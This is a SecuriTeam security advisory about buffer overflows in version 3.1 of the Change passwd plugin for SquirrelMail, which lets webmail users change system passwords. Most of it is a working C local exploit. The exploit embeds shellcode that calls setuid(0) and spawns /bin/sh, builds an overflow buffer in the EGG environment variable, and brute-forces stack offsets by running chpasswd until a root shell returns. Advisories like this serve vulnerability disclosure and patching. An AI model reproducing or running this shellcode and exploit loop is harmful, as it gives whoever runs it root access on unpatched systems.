[EXPL] SquirrelMail Change Passwd Plugins Multiple Buffer Overflows (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



SquirrelMail Change Passwd Plugins Multiple Buffer Overflows (Exploit)
------------------------------------------------------------------------


SUMMARY

" <http://www.squirrelmail.org/> SquirrelMail is a standards-based webmail
package written in PHP4." "
<http://www.squirrelmail.org/plugin_view.php?id=117> Change Passwrdplugins
allow your users to change his/her system password in /etc/passwd or
/etc/shadow. "

Improper length validation of variables allows attackers to execute
arbitrary code using a buffer overflows in SquirrelMail's change passwd
plugins.

DETAILS

Vulnerable Systems:
* Change passwd version 3.1

Immune Systems:
* Change passwd version 4.0

Exploit:
/* Local Exploit
* Multiple
buffer overflows are present in the handling of command line
arguements in chpasswd.
The bug allows a
hacker to exploit the process to run arbitrary code. */

#include <stdio.h>
#include <stdlib.h>

const char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
"\x89\xe5\x31\xc0\x50\x55\x89\xe5"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x89\xe9\x89"
"\xea\xb0\x0b\xcd\x80";

long get_sp(){
__asm__("movl %esp,%eax;");
};

int main(){
char buffer[1024];
long stack = get_sp();
int result = 1;
long offset = 0;
printf ("[!] Change_passwd v3.1(SquirrelMail plugin) exploit\n");
printf ("[+] Current stack [0x%x]\n",stack);
while(offset <= 268435456){
offset = offset + 1;
stack = get_sp() + offset;
memcpy(&buffer,"EGG=",4);
int a = 4;
while(a <= 108){
memcpy(&buffer[a],"x",1);
a = a + 1;}
memcpy(&buffer[108],&stack,4);
memcpy(&buffer[112],&shellcode,sizeof(shellcode));
putenv(buffer);
result = system("./chpasswd $EGG");
if(result == 0){exit(0);};
};
};

/*EoF*/


ADDITIONAL INFORMATION

The information has been provided by <mailto:rodhedor@xxxxxxxxxxx> rod
hedor.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages